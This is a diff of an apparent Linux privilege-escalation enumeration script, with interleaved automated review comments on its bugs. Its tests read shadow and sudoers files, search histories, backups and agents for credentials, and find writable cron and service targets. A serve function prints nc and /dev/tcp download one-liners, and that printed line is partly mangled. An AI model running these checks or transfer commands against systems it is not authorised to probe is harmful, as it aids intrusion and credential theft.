This allows you" + echo " to do faster scans at the cost of completeness" + echo " -p SECONDS Time that the process monitor will spend watching for" + echo " processes. A value of 0 will disable any watch (default: 60)" + echo " -S Serve the lse.sh script in this host so it can be retrieved" + echo " from a remote host." } lse_ask() { local question="$1" # We use stderr to print the question cecho "${white}${question}: ${reset}" >&2 - read answer - case answer in + read -r answer + case "$answer" in y|Y|yes|Yes|ok|Ok|true|True) return 0 ;; @@ -264,7 +338,7 @@ lse_request_information() { if $lse_interactive; then cecho "${grey}---\n" [ -z "$lse_user" ] && lse_user=`lse_ask "Could not find current user name. Current user?"` - lse_pass=`lse_ask "If you know the current user password, write it here for better results"` + lse_pass=`lse_ask "If you know the current user password, write it here to check sudo privileges"` cecho "${grey}---\n" fi } @@ -272,7 +346,7 @@ lse_test_passed() { # Checks if a test passed by ID local id="$1" for i in $lse_passed_tests; do - [ "$i" == "$id" ] && return 0 + [ "$i" = "$id" ] && return 0 done return 1 } @@ -300,7 +374,7 @@ lse_test() { if [ "$lse_selection" ]; then local sel_match=false for s in $lse_selection; do - if [ "$s" == "$id" ] || [ "$s" == "${id:0:3}" ]; then + if [ "$s" = "$id" ] || [ "$s" = "`printf \"%s\" \"$id\" | cut -c1-3`" ]; then sel_match=true fi done @@ -319,7 +393,7 @@ lse_test() { # Check dependencies local non_met_deps="" for d in $deps; do - lse_test_passed "$d" || non_met_deps+="$d" + lse_test_passed "$d" || non_met_deps="$non_met_deps $d" done if [ "$non_met_deps" ]; then cecho " ${grey}skip\n" 
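Review bot: `lse_ask` now does `read -r answer` with terminal echo left on, and `lse_request_information` uses it to collect a password (`lse_pass=\`lse_ask "If you know the current user password, write it here to check sudo privileges"\``), so the secret is displayed and kept in the terminal scrollback. For that prompt, wrap the read with `stty -echo 2>/dev/null; read -r answer; stty echo 2>/dev/null` (selected by an extra argument to `lse_ask`), since bash's `read -s` is not portable and this commit is removing bashisms. `answer` is also not declared `local`, so the last reply leaks into the global namespace. The `case "$answer" in` arms of `lse_ask` continue outside the hunk.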
@@ -332,8 +406,8 @@ lse_test() { return 1 fi - # If level is 2 we do not execute level 2 tests unless their output needs - # to be assigned to a variable + # If level is 2 and lse_level is less than 2, then we do not execute + # level 2 tests unless their output needs to be assigned to a variable if [ $level -ge 2 ] && [ $lse_level -lt 2 ] && [ -z "$var" ]; then cecho " ${grey}skip\n" return 1 @@ -341,20 +415,20 @@ lse_test() { if $lse_DEBUG; then output="`eval "$cmd" 2>&1`" else - # Execute comand + # Execute command if this test's level is in scope output="`eval "$cmd" 2>/dev/null`" # Assign variable if available fi - [ "$var" ] && eval "$var='$output'" + [ "$var" ] && [ "$output" ] && readonly "${var}=$output" # Mark test as executed - lse_executed_tests+=" $id" + lse_executed_tests="$lse_executed_tests $id" fi if [ -z "$output" ]; then - cecho "${grey} nope${reset}\n" + cecho " ${grey}nope${reset}\n" return 1 else - lse_passed_tests+=" $id" + lse_passed_tests="$lse_passed_tests $id" cecho "${r} yes!${reset}\n" if [ $lse_level -ge $level ]; then cecho "${grey}---$reset\n" @@ -365,6 +439,8 @@ lse_test() { fi } lse_show_info() { + echo + cecho "${lcyan} LSE Version:${reset} $lse_version\n" echo cecho "${lblue} User:${reset} $lse_user\n" cecho "${lblue} User ID:${reset} $lse_user_id\n" 
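Review bot: The comment `# Assign variable if available` now sits inside the `else` branch just above `fi`, while the statement it describes, `[ "$var" ] && [ "$output" ] && readonly "${var}=$output"`, comes after the `fi`; move the comment below `fi`, directly above that line. Replacing `eval "$var='$output'"` with `readonly` removes the quoting problem of the old line, but it changes two things worth recording: a test that produces no output no longer sets the variable at all (dependants see it unset rather than empty), and a second `lse_test` call with the same `var` would fail on the read-only assignment. A comment such as `# readonly: avoids eval on test output; the variable stays unset when the test finds nothing` would capture the intent.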
@@ -387,6 +463,41 @@ lse_show_info() { cecho "${lblue}Architecture:${reset} $lse_arch\n" echo } +lse_serve() { + # get port + which nc >/dev/null || lse_error "Could not find 'nc' netcat binary." + + local_ips="`ip a | grep -Eo 'inet ([0-9]{1,3}\.){3}[0-9]{1,3}' | cut -d' ' -f2`" + + # Get a valid and non used port + port=`od -An -N2 -i /dev/random|grep -Eo '[0-9]+'` + port_valid=true + while true; do + for ip in $local_ips; do + nc -z "$ip" "$port" && port_valid=false + done + if [ $((port)) -lt 1024 ] || [ $((port)) -gt 65500 ]; then + port_valid=false + fi + $port_valid && break + port=`od -An -N2 -i /dev/random|grep -Eo '[0-9]+'` + done + + echo + cecho " Serving ${white}Linux Smart Enumeration${reset} on port ${blue}$port${reset}.\n" + echo + cecho " Depending on your IP and available tools, some of these commands should download it in a remote host:\n" + for ip in $local_ips; do + [ "$ip" = "127.0.0.1" ] && continue + echo + cecho "${reset} [${blue}$ip${reset}]\n" + cecho "${green} * ${white}nc ${reset} $ip $port > lse.sh /dev/tcp/${reset}$ip/$port;printf '\\\\n'>&3;cat<&3>lse.sh;exec 3<&-;chmod 755 lse.sh\n" + done + nc -l -q0 -p "$port" < "$0" >/dev/null +} lse_header() { local id="$1" shift @@ -397,7 +508,7 @@ lse_header() { if [ "$lse_selection" ]; then local sel_match=false for s in $lse_selection; do - if [ "${s:0:3}" == "$id" ]; then + if [ "`printf \"%s\" \"$s\"|cut -c1-3`" = "$id" ]; then sel_match=true break fi 
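Review bot: In `lse_serve` the port-search loop never terminates once a candidate is rejected: `port_valid=true` is set once before `while true; do`, and the body only ever sets it to `false`, so after the first busy or out-of-range port every later iteration draws a new `port` but `$port_valid && break` can never succeed. Move the reset inside the loop: `while true; do port_valid=true; for ip in $local_ips; do`. `which nc >/dev/null || lse_error "Could not find 'nc' netcat binary."` also does not stop the function, because `lse_error` only prints; `command -v nc >/dev/null || { lse_error "..."; return 1; }` both checks portably and bails out. `local_ips`, `port` and `port_valid` should be declared `local`.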
@@ -406,18 +517,45 @@ lse_header() { fi for i in $(seq ${#title} 70); do - text+="=" + text="$text=" done - text+="(${green} $title ${magenta})=====" + text="$text(${green} $title ${magenta})=====" cecho "$text${reset}\n" } lse_exit() { local ec=1 local text="\n${magenta}==================================" [ "$1" ] && ec=$1 - text+="(${green} FINISHED ${magenta})==================================" + text="$text(${green} FINISHED ${magenta})==================================" cecho "$text${reset}\n" - exit $ec + rm -f "$lse_procmon_data" + rm -f "$lse_procmon_lock" + exit "$ec" +} +lse_procmon() { + # monitor processes + #NOTE: The first number will be the number of occurrences of a process due to + # uniq -c + while [ -f "$lse_procmon_lock" ]; do + ps -ewwwo start_time,pid,user:50,args + sleep 0.001 + done | grep -v 'ewwwo start_time,pid,user:50,args' | sed 's/^ *//g' | tr -s '[:space:]' | grep -v "^START" | grep -Ev '[^ ]+ [^ ]+ [^ ]+ \[' | sort -Mr | uniq -c | sed 's/^ *//g' > "$lse_procmon_data" +} +lse_proc_print() { + # Pretty prints output from lse_procmom received via stdin + printf "${green}%s %8s %8s %s\n" "START" "PID" "USER" "COMMAND" + while read -r l; do + p_num=`echo "$l" | cut -d" " -f1` + p_time=`echo "$l" | cut -d" " -f2` + p_pid=`echo "$l" | cut -d" " -f3` + p_user=`echo "$l" | cut -d" " -f4` + p_args=`echo "$l" | cut -d" " -f5-` + if [ $((p_num)) -lt 20 ]; then # few times probably periodic + printf "${red}%s ${reset}%8s ${yellow}%8s ${red}%s\n" "$p_time" "$p_pid" "$p_user" "$p_args" + else + printf "${magenta}%s ${reset}%8s ${yellow}%8s ${reset}%s\n" "$p_time" "$p_pid" "$p_user" "$p_args" + fi + done } #) 
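Review bot: `lse_procmon`'s loop `while [ -f "$lse_procmon_lock" ]; do ps ...; sleep 0.001; done` has no exit condition of its own; it stops only when the lock file disappears, which in this hunk happens solely in `lse_exit` (`rm -f "$lse_procmon_lock"`). If the run is interrupted before `lse_exit` and the monitor was started in the background (the caller is outside the hunk), it keeps spawning `ps` roughly every millisecond until someone deletes the temp file. Bounding the loop with a deadline set beforehand, `deadline=$(( $(date +%s) + lse_proc_time + 5 ))` and `while [ -f "$lse_procmon_lock" ] && [ "\`date +%s\`" -lt "$deadline" ]; do`, keeps it finite however the script ends; fractional `sleep` and `ps -ewwwo start_time,pid,user:50,args` are GNU/busybox extensions, which a short comment should state. In `lse_proc_print`, `p_num`, `p_time`, `p_pid`, `p_user` and `p_args` should be `local`.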
@@ -440,17 +578,19 @@ lse_run_tests_users() { #user in an administrative group lse_test "usr010" "1" \ "Is current user in an administrative group?" \ - 'grep -E "^(adm|admin|root|sudo|wheel)" /etc/group | grep -E "(:|,)$lse_user"' + 'grep $lse_grep_opts -E "^(adm|admin|root|sudo|wheel)" /etc/group | grep $lse_grep_opts -E "(:|,)$lse_user"' #other users in an administrative group lse_test "usr020" "1" \ "Are there other users in an administrative groups?" \ - 'grep -E "^(adm|admin|root|sudo|wheel)" /etc/group | grep -Ev ":$"' + 'grep $lse_grep_opts -E "^(adm|admin|root|sudo|wheel)" /etc/group | grep -Ev ":$" | grep $lse_grep_opts -Ei ":[a-z_-]+\$"' #other users with shell lse_test "usr030" "1" \ "Other users with shell" \ - 'grep -E "sh$" /etc/passwd' + 'grep $lse_grep_opts -E ":/[a-z/]+sh\$" /etc/passwd' \ + "" \ + "lse_shell_users" #user env information lse_test "usr040" "2" \ @@ -466,6 +606,19 @@ lse_run_tests_users() { lse_test "usr060" "2" \ "Other users" \ 'cat /etc/passwd' + + #find defined PATHs + lse_test "usr070" "1" \ + "PATH variables defined inside /etc" \ + 'for p in `grep -ERh "^ *PATH=.*" /etc/ 2> /dev/null | tr -d \"\'"'"' | cut -d= -f2 | tr ":" "\n" | sort -u`; do [ -d "$p" ] && echo "$p";done' \ + "" \ + "lse_exec_paths" + + #check if . is in PATHs + lse_test "usr080" "0" \ + "Is '.' in a PATH variable defined inside /etc?" \ + 'for ep in $lse_exec_paths; do [ "$ep" = "." ] && grep -ER "^ *PATH=.*" /etc/ 2> /dev/null | tr -d \"\'"'"' | grep -E "[=:]\.([:[:space:]]|\$)";done' \ + "usr070" } @@ -480,13 +633,13 @@ lse_run_tests_sudo() { #can we sudo without supplying a password lse_test "sud000" "0" \ "Can we sudo without a password?" \ - 'echo "" | sudo -S id' && lse_sudo=true + 'echo "" | sudo -nS id' && lse_sudo=true #can we list sudo commands without supplying a password $lse_sudo || \ lse_test "sud010" "0" \ "Can we list sudo commands without a password?" \ - 'echo "" | sudo -S -l' \ + 'echo "" | sudo -nS -l' \ "" \ "lse_sudo_commands" 
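Review bot: The new final filter in usr020, `grep $lse_grep_opts -Ei ":[a-z_-]+\$"`, only matches a member field made of a single name in `[a-z_-]`, so an administrative group with two or more members (`sudo:x:27:alice,bob`) or a member whose name contains a digit or dot is removed from the output — the opposite of what "Are there other users in an administrative groups?" should surface. Because `grep -Ev ":$"` already drops groups with an empty member list, the last grep exists only to highlight; `grep $lse_grep_opts -E ":[^:]+\$"` highlights the whole member list without excluding anything. Note that `$lse_grep_opts` is `--color=always` (options hunk), so the escape sequences the first grep inserts are part of the text the second grep matches; usr010's `(:|,)$lse_user` appears to survive because the colouring wraps only the group name, but that coupling deserves a comment on `lse_grep_opts`.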
@@ -509,8 +662,8 @@ lse_run_tests_sudo() { #check if we can read the sudoers file lse_test "sud040" "1" \ - "Can we read /etc/sudoers?" \ - 'cat /etc/sudoers' + "Can we read sudoers files?" \ + 'grep -R "" /etc/sudoers*' #check users that sudoed in the past lse_test "sud050" "1" \ @@ -526,23 +679,24 @@ lse_run_tests_filesystem() { #writable files outside user's home. NOTE: Does not check if user can write in symlink destination (performance reasons: -L implies -noleaf) lse_test "fst000" "1" \ "Writable files outside user's home" \ - 'find / \! -type l -writable -not -path "$lse_home/*" -not -path "/proc/*" -not -path "/sys/*" -not -path "/dev/*" -not -path "/run/*"; + 'find / -path "$lse_home" -prune -o $lse_find_opts -not -type l -writable -print; # Add symlinks owned by the user (so the user can change where they point) - find / -type l -user $lse_user -not -path "$lse_home/*" -not -path "/proc/*" -not -path "/sys/*" -not -path "/dev/*" -not -path "/run/*"' \ + find / -path "$lse_home" -prune -o $lse_find_opts -type l -user $lse_user -print' \ "" \ "lse_user_writable" #get setuid binaries lse_test "fst010" "1" \ "Binaries with setuid bit" \ - 'find / -perm -4000 -type f' \ + 'find / $lse_find_opts -perm -4000 -type f -print' \ "" \ "lse_setuid_binaries" #uncommon setuid binaries lse_test "fst020" "0" \ "Uncommon setuid binaries" \ - 'local setuidbin="$lse_setuid_binaries"; for cs in "${lse_common_setuid[@]}"; do setuidbin=`echo -e "$setuidbin" | grep -Ev "$cs"`;done ; echo -e "$setuidbin"' \ + 'local setuidbin="$lse_setuid_binaries"; local IFS=" +"; for cs in ${lse_common_setuid}; do setuidbin=`printf "$setuidbin\n" | grep -Ev "^$cs$"`;done ; printf "$setuidbin\n"' \ "fst010" #can we write to any setuid binary 
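Review bot: fst020 passes data as the printf format string, `printf "$setuidbin\n"`, so a path containing `%` is interpreted as a conversion and the output is mangled or the command fails; file names come from a filesystem walk and are not under the script's control. The fix is the form this commit already uses in the processes hunk, `printf "%s\n" "$setuidbin"`, in both places: ``setuidbin=`printf "%s\n" "$setuidbin" | grep -Ev "^$cs$"` `` and the final `printf "%s\n" "$setuidbin"`. The same `printf "$var\n"` pattern appears in fst050 (@@ -554), sec020/sec030/sec050 (@@ -719 and @@ -736), ret510 (@@ -798), srv000 (@@ -867), srv500 (@@ -934) and sof070/sof080 (@@ -1018), and should be changed the same way. lse_run_tests_filesystem() continues outside the hunk.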
@@ -554,13 +708,13 @@ lse_run_tests_filesystem() { #get setgid binaries lse_test "fst040" "1" \ "Binaries with setgid bit" \ - 'find / -perm -2000 -type f' \ + 'find / $lse_find_opts -perm -2000 -type f -print' \ "lse_setgid_binaries" #uncommon setgid binaries lse_test "fst050" "0" \ "Uncommon setgid binaries" \ - 'echo -e "$lse_setgid_binaries" | grep -Ev "^/(bin|sbin|usr/bin|usr/lib|usr/sbin)"' \ + 'printf "$lse_setgid_binaries\n" | grep -Ev "^/(bin|sbin|usr/bin|usr/lib|usr/sbin)"' \ "fst040" #can we write to any setgid binary @@ -582,7 +736,7 @@ lse_run_tests_filesystem() { #check for SSH files in home directories lse_test "fst090" "1" \ "SSH files in home directories" \ - 'for h in $(cut -d: -f6 /etc/passwd | sort | uniq | grep -Ev "^(/|/dev|/bin|/proc|/run/.*|/var/run/.*)$"); do find "$h" \( -name "*id_dsa*" -o -name "*id_rsa*" -o -name "*id_ecdsa*" -o -name "*id_ed25519*" -o -name "known_hosts" -o -name "authorized_hosts" -o -name "authorized_keys" \) -exec ls -la {} \; ; done' + 'for h in $(cut -d: -f6 /etc/passwd | sort -u | grep -Ev "^(/|/dev|/bin|/proc|/run/.*|/var/run/.*)$"); do find "$h" \( -name "*id_dsa*" -o -name "*id_rsa*" -o -name "*id_ecdsa*" -o -name "*id_ed25519*" -o -name "known_hosts" -o -name "authorized_hosts" -o -name "authorized_keys" \) -exec ls -la {} \; ; done' #check useful binaries lse_test "fst100" "1" \ @@ -597,7 +751,7 @@ lse_run_tests_filesystem() { #looking for credentials in /etc/fstab and /etc/mtab lse_test "fst120" "0" \ "Are there any credentials in fstab/mtab?" \ - 'grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab' + 'grep $lse_grep_opts -Ei "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab' #check if current user has mail lse_test "fst130" "1" \ 
@@ -612,23 +766,47 @@ lse_run_tests_filesystem() { #check for code repositories lse_test "fst150" "1" \ "Looking for GIT/SVN repositories" \ - 'find / \( -name ".git" -o -name ".svn" \)' + 'find / $lse_find_opts \( -name ".git" -o -name ".svn" \) -print' #can we write to files that can give us root lse_test "fst160" "0" \ "Can we write to critical files?" \ - 'for uw in $lse_user_writable; do [ -f "$uw" ] && for cw in "${lse_critical_writable[@]}"; do ls $cw 2>/dev/null | egrep "^$uw$"; done ; done' \ + 'for uw in $lse_user_writable; do [ -f "$uw" ] && IFS=" +"; for cw in ${lse_critical_writable}; do [ "$cw" = "$uw" ] && [ -w "$cw" ] && ls -l $cw; done ; done' \ "fst000" + #can we write to directories that can give us root + lse_test "fst170" "0" \ + "Can we write to critical directories?" \ + 'for uw in $lse_user_writable; do [ -d "$uw" ] && IFS=" +"; for cw in ${lse_critical_writable_dirs}; do [ "$cw" = "$uw" ] && [ -w "$cw" ] && ls -ld $cw; done ; done' \ + "fst000" + + #can we write to directories inside PATHS + lse_test "fst180" "0" \ + "Can we write to directories from PATH defined in /etc?" \ + 'for ep in $lse_exec_paths; do [ -d "$ep" ] && [ -w "$ep" ] && ls -ld "$ep"; done' \ + "usr070" + + #can we read backups + lse_test "fst190" "0" \ + "Can we read any backup?" \ + 'find / $lse_find_opts -path /usr/lib -prune -o -path /usr/share -prune -o -regextype egrep -iregex ".*(backup|dump|cop(y|ies)|bak|bkp)[^/]*\.(sql|tgz|tar|zip)?\.?(gz|xz|bzip2|bz2|lz|7z)?" -readable -type f -exec ls -al {} \;' + + #are there possible credentials in any shell history files + lse_test "fst200" "0" \ + "Are there possible credentials in any shell history file?" \ + 'for h in .bash_history .history .histfile .zhistory; do [ -f "$lse_home/$h" ] && grep $lse_grep_opts -Ei "(user|username|login|pass|password|pw|credentials)[=: ][a-z0-9]+" "$lse_home/$h"; done' + #files owned by user lse_test "fst500" "2" \ "Files owned by user '$lse_user'" \ - 'find / -user $lse_user -type f ! 
-path "/proc/*" ! -path "/sys/*" -exec ls -al {} \;' + 'find / $lse_find_opts -user $lse_user -type f -exec ls -al {} \;' #check for SSH files anywhere lse_test "fst510" "2" \ "SSH files anywhere" \ - 'find / \( -name "*id_dsa*" -o -name "*id_rsa*" -o -name "known_hosts" -o -name "authorized_hosts" -o -name "authorized_keys" \) -exec ls -la {} \;' + 'find / $lse_find_opts \( -name "*id_dsa*" -o -name "*id_rsa*" -o -name "known_hosts" -o -name "authorized_hosts" -o -name "authorized_keys" \) -exec ls -la {} \;' #dump hosts.equiv file lse_test "fst520" "2" \ @@ -666,22 +844,25 @@ lse_run_tests_system() { "Does the /etc/passwd have hashes?" \ 'grep -v "^[^:]*:[x]" /etc/passwd' + #check if /etc/group has group password hashes (old system) + lse_test "sys022" "0" \ + "Does the /etc/group have hashes?" \ + 'grep -v "^[^:]*:[x]" /etc/group' + #check if we can read any shadow file - for s in 'shadow' 'shadow-' 'shadow~' 'master.passwd'; do - lse_test "sys030" "0" \ - "Can we read /etc/$s file?" \ - 'cat /etc/$s' - done + lse_test "sys030" "0" \ + "Can we read shadow files?" \ + 'for sf in "shadow" "shadow-" "shadow~" "gshadow" "gshadow-" "master.passwd"; do [ -r "/etc/$sf" ] && printf "%s\n---\n" "/etc/$sf" && cat "/etc/$sf" && printf "\n\n";done' #check for superuser accounts lse_test "sys040" "1" \ "Check for other superuser accounts" \ - 'for u in $(cut -d: -f1 /etc/passwd); do [ $(id -u $u) == 0 ] && echo $u; done | grep -v root' + 'for u in $(cut -d: -f1 /etc/passwd); do [ $(id -u $u) = 0 ] && echo $u; done | grep -v root' #can root log in via SSH lse_test "sys050" "1" \ "Can root user log in via SSH?" \ - 'grep -E "^[[:space:]]*PermitRootLogin " /etc/ssh/sshd_config | grep -E "(yes|without-password)"' + 'grep -E "^[[:space:]]*PermitRootLogin " /etc/ssh/sshd_config | grep -E "(yes|without-password|prohibit-password)"' #list available shells lse_test "sys060" "2" \ 
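Review bot: In fst160 and fst170 the guard `[ -f "$uw" ] && IFS="..."; for cw in ...` only gates the IFS assignment — the `;` ends the `&&` list, so the inner loop runs for every entry — and IFS is changed without being restored, unlike fst020 in this commit which uses `local IFS`. Writing the body as `[ -f "$uw" ] || continue; local IFS=...; for cw in ...` (with the same newline IFS value fst020 uses) keeps both the intent and the scope. fst190 relies on `-regextype egrep` and `-readable`, which are GNU find extensions; on a BSD or busybox find the test fails outright, which may be acceptable but deserves a comment. lse_run_tests_filesystem() continues outside the hunk.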
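Review bot: sys050 reads only /etc/ssh/sshd_config, while OpenSSH 8.2+ honours `Include /etc/ssh/sshd_config.d/*.conf` and uses the first value obtained, so a `PermitRootLogin` set in a drop-in is missed and a later value in the main file is reported instead; extending the grep to `/etc/ssh/sshd_config /etc/ssh/sshd_config.d/*.conf` with `-h` covers the common layout. The added `prohibit-password` value, like `without-password`, still allows key-based root login, so keeping the test at level 1 is reasonable but the description could say so. In sys040 `$(id -u $u)` is unquoted, so an entry for which `id` fails turns the test into `[ = 0 ]` and prints an error rather than being skipped; `[ "$(id -u "$u" 2>/dev/null)" = 0 ]` avoids that. lse_run_tests_system() starts outside the hunk.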
@@ -719,12 +900,12 @@ lse_run_tests_security() { #check if we can write an a binary with capabilities lse_test "sec020" "0" \ "Can we write to a binary with caps?" \ - 'for b in $(echo -e "$lse_cap_bin" | cut -d" " -f1); do [ -w "$b" ] && echo "$b"; done' + 'for b in $(printf "$lse_cap_bin\n" | cut -d" " -f1); do [ -w "$b" ] && echo "$b"; done' #check if we have all capabilities in any binary lse_test "sec030" "0" \ "Do we have all caps in any binary?" \ - 'echo -e "$lse_cap_bin" | grep -v "cap_"' + 'printf "$lse_cap_bin\n" | grep -v "cap_"' #search /etc/security/capability.conf for users associated capapilies lse_test "sec040" "1" \ @@ -736,8 +917,13 @@ lse_run_tests_security() { #does user have capabilities lse_test "sec050" "0" \ "Does current user have capabilities?" \ - 'echo -e "$lse_user_caps" | grep "$lse_user"' \ + 'printf "$lse_user_caps\n" | grep "$lse_user"' \ "sec040" + + #can user read the auditd log + lse_test "sec060" "0" \ + "Can we read the auditd log?" \ + 'al=/var/log/audit/audit.log; test -r "$al" && echo "tail $al:" && echo && tail "$al"' } @@ -754,7 +940,7 @@ lse_run_tests_recurrent_tasks() { #cron tasks writable by user lse_test "ret010" "0" \ "Cron tasks writable by user" \ - 'find -L /etc/cron* /etc/anacron /var/spool/cron -writable' \ + 'find -L /etc/cron* /etc/anacron /var/spool/cron -writable' #list cron jobs lse_test "ret020" "1" \ 
@@ -771,17 +957,18 @@ lse_run_tests_recurrent_tasks() { "Can we list other user cron tasks?" \ 'for u in $(cut -d: -f 1 /etc/passwd); do [ "$u" != "$lse_user" ] && crontab -l -u "$u"; done' - #can we write to executable paths present in cron tasks? - lse_test "ret050" "0" \ - "Can we write to executable paths present in cron jobs" \ - 'for uw in $lse_user_writable; do [ -f "$uw" ] && [ -x "$uw" ] && grep -R "$uw" /etc/crontab /etc/cron.d/ /etc/anacrontab ; done' \ - "fst000" - #can we write to any paths present in cron tasks? - lse_test "ret060" "1" \ + lse_test "ret050" "1" \ "Can we write to any paths present in cron jobs" \ - 'for uw in $lse_user_writable; do grep -R "$uw" /etc/crontab /etc/cron.d/ /etc/anacrontab ; done | sort | uniq' \ - "fst000" + 'for p in `grep --color=never -hERoi "/[a-z0-9_/\.\-]+" /etc/cron* | sort -u`; do [ -w "$p" ] && echo "$p"; done' \ + "" \ + "lse_user_writable_cron_paths" + + #can we write to executable paths present in cron tasks? + lse_test "ret060" "0" \ + "Can we write to executable paths present in cron jobs" \ + 'for uwcp in $lse_user_writable_cron_paths; do [ -w "$uwcp" ] && [ -x "$uwcp" ] && grep $lse_grep_opts -R "$uwcp" /etc/crontab /etc/cron.d/ /etc/anacrontab ; done' \ + "ret050" #list cron files lse_test "ret400" "2" \ @@ -798,7 +985,7 @@ lse_run_tests_recurrent_tasks() { #can we write in any system timer? lse_test "ret510" "0" \ "Can we write in any system timer?" \ - 'echo -e "$lse_user_writable" | grep -E "\.timer$"' \ + 'printf "$lse_user_writable\n" | grep -E "\.timer$"' \ "fst000" #system timers 
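Review bot: ret050 builds `lse_user_writable_cron_paths` only from `/etc/cron*`, but ret060 then greps `/etc/crontab /etc/cron.d/ /etc/anacrontab` for those paths, so a writable executable referenced only in /etc/anacrontab can no longer be reported, whereas the removed ret050 did search that file. Adding the missing source to the ret050 grep, `grep --color=never -hERoi "/[a-z0-9_/\.\-]+" /etc/cron* /etc/anacrontab 2>/dev/null | sort -u`, closes the gap. The character class also excludes `+`, `@` and `~`, so paths containing those are silently skipped; that is probably an acceptable trade-off but worth a comment. lse_run_tests_recurrent_tasks() starts outside the hunk.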
@@ -867,13 +1054,13 @@ lse_run_tests_services() { #check write permissions in init.d/* inetd.conf xinetd.conf lse_test "srv000" "0" \ "Can we write in service files?" \ - 'echo -e "$lse_user_writable" | grep -E "^/etc/(init/|init\.d/|rc\.d/|rc[0-9S]\.d/|rc\.local|inetd\.conf|xinetd\.conf|xinetd\.d/)"' \ + 'printf "$lse_user_writable\n" | grep -E "^/etc/(init/|init\.d/|rc\.d/|rc[0-9S]\.d/|rc\.local|inetd\.conf|xinetd\.conf|xinetd\.d/)"' \ "fst000" #check write permissions for binaries involved in services lse_test "srv010" "0" \ "Can we write in binaries executed by services?" \ - 'for b in $(grep -ERvh "^#" /etc/inetd.conf /etc/xinetd.conf /etc/xinetd.d/ /etc/init.d/ /etc/rc* 2>/dev/null | tr -s "[[:space:]]" "\n" | grep -E "^/" | grep -Ev "^/(dev|run|sys|proc|tmp)/" | sort | uniq); do [ -x "$b" ] && [ -w "$b" ] && echo "$b" done' + 'for b in $(grep -ERvh "^#" /etc/inetd.conf /etc/xinetd.conf /etc/xinetd.d/ /etc/init.d/ /etc/rc* 2>/dev/null | tr -s "[[:space:]]" "\n" | grep -E "^/" | grep -Ev "^/(dev|run|sys|proc|tmp)/" | sort -u); do [ -x "$b" ] && [ -w "$b" ] && echo "$b" done' #init.d files NOT belonging to root lse_test "srv020" "1" \ 
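Review bot: As rendered here the srv010 command ends `... && echo "$b" done'`, with no `;` or newline between `echo "$b"` and `done`; if that is how the line reads in the file, `done` is passed to echo as an argument and the `for` loop is never closed, so the eval fails; if a newline was lost in rendering, nothing is wrong. The same ending appears in srv510 (@@ -934). Either way `echo "$b"; done'` is unambiguous. lse_run_tests_services() starts outside the hunk.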
@@ -934,13 +1121,13 @@ lse_run_tests_services() { #check write permissions in systemd services lse_test "srv500" "0" \ "Can we write in systemd service files?" \ - 'echo -e "$lse_user_writable" | grep -E "^/(etc/systemd/|lib/systemd/).+\.service$"' \ + 'printf "$lse_user_writable\n" | grep -E "^/(etc/systemd/|lib/systemd/).+\.service$"' \ "fst000" #check write permissions for binaries involved in systemd services lse_test "srv510" "0" \ "Can we write in binaries executed by systemd services?" \ - 'for b in $(grep -ERh "^Exec" /etc/systemd/ /lib/systemd/ 2>/dev/null | tr "=" "\n" | tr -s "[[:space:]]" "\n" | grep -E "^/" | grep -Ev "^/(dev|run|sys|proc|tmp)/" | sort | uniq); do [ -x "$b" ] && [ -w "$b" ] && echo "$b" done' + 'for b in $(grep -ERh "^Exec" /etc/systemd/ /lib/systemd/ 2>/dev/null | tr "=" "\n" | tr -s "[[:space:]]" "\n" | grep -E "^/" | grep -Ev "^/(dev|run|sys|proc|tmp)/" | sort -u); do [ -x "$b" ] && [ -w "$b" ] && echo "$b" done' # systemd files not belonging to root lse_test "srv520" "1" \ 
@@ -954,34 +1141,6 @@ lse_run_tests_services() { } -####################################################################( processes -lse_run_tests_processes() { - lse_header "pro" "processes" - - #lookup process binaries - lse_proc_bin=`(ps -eo comm | sort | uniq | xargs which)2>/dev/null` - - #check if we have wire permissions in any process binary - lse_test "pro000" "0" \ - "Can we write in any process binary?" \ - 'for b in $lse_proc_bin; do [ -w "$b" ] && echo $b; done' - - lse_test "pro010" "1" \ - "Processes running with root permissions" \ - 'ps -u root -U root -f | grep -Ev "\[[[:alnum:]]"' - - #running processes - lse_test "pro500" "2" \ - "Running processes" \ - 'ps auxf' - - #list running process binaries and their permissions - lse_test "pro510" "2" \ - "Running process binaries and permissions" \ - 'echo -e "$lse_proc_bin" | xargs -n1 ls -l' -} - - #####################################################################( software lse_run_tests_software() { lse_header "sof" "software" @@ -996,6 +1155,11 @@ lse_run_tests_software() { "Can we connect to MySQL as root without password?" \ 'mysqladmin -uroot version' + #check if there are credentials stored in .mysql-history + lse_test "sof015" "0" \ + "Are there credentials in mysql_history file?" \ + 'grep -Ei "(pass|identified by|md5\()" "$lse_home/.mysql_history"' + #checks to see if we can connect to postgres templates without password lse_test "sof020" "0" \ "Can we connect to PostgreSQL template0 as postgres and no pass?" \ 
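Review bot: sof015's comment names `.mysql-history` while the test reads `$lse_home/.mysql_history`; the comment should use the real file name. The mysql client also honours `MYSQL_HISTFILE`, so reading `"${MYSQL_HISTFILE:-$lse_home/.mysql_history}"` catches relocated history files at no cost. The processes block removed by @@ -954 is re-added later in this commit, so that hunk is a move rather than a deletion. lse_run_tests_software() starts outside the hunk.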
@@ -1018,7 +1182,29 @@ lse_run_tests_software() { #find htpassword files lse_test "sof040" "0" \ "Found any .htpasswd files?" \ - 'find / -name "*.htpasswd" -print -exec cat {} \;' + 'find / $lse_find_opts -name "*.htpasswd" -print -exec cat {} \;' + + #check if there are ssh private keys in ssh-agent + lse_test "sof050" "0" \ + "Are there private keys in ssh-agent?" \ + 'ssh-add -l' + + #check if there are gpg keys in gpg-agent + lse_test "sof060" "0" \ + "Are there gpg keys cached in gpg-agent?" \ + 'gpg-connect-agent "keyinfo --list" /bye | grep "D - - 1"' + + #check if there is a writable ssh-agent socket + lse_test "sof070" "0" \ + "Can we write to a ssh-agent socket?" \ + 'for f in $lse_user_writable; do test -S "$f" && printf "$f" | grep -Ea "ssh-[A-Za-z0-9]+/agent\.[0-9]+"; done' \ + "fst000" + + #check if there is a writable gpg-agent socket + lse_test "sof080" "0" \ + "Can we write to a gpg-agent socket?" \ + 'for f in $lse_user_writable; do test -S "$f" && printf "$f" | grep -a "gpg-agent"; done' \ + "fst000" #sudo version - check to see if there are any known vulnerabilities with this lse_test "sof500" "2" \ @@ -1049,12 +1235,12 @@ lse_run_tests_containers() { #check to see if we are in a docker container lse_test "ctn000" "1" \ "Are we in a docker container?" \ - 'grep -i docker /proc/self/cgroup; find / -name 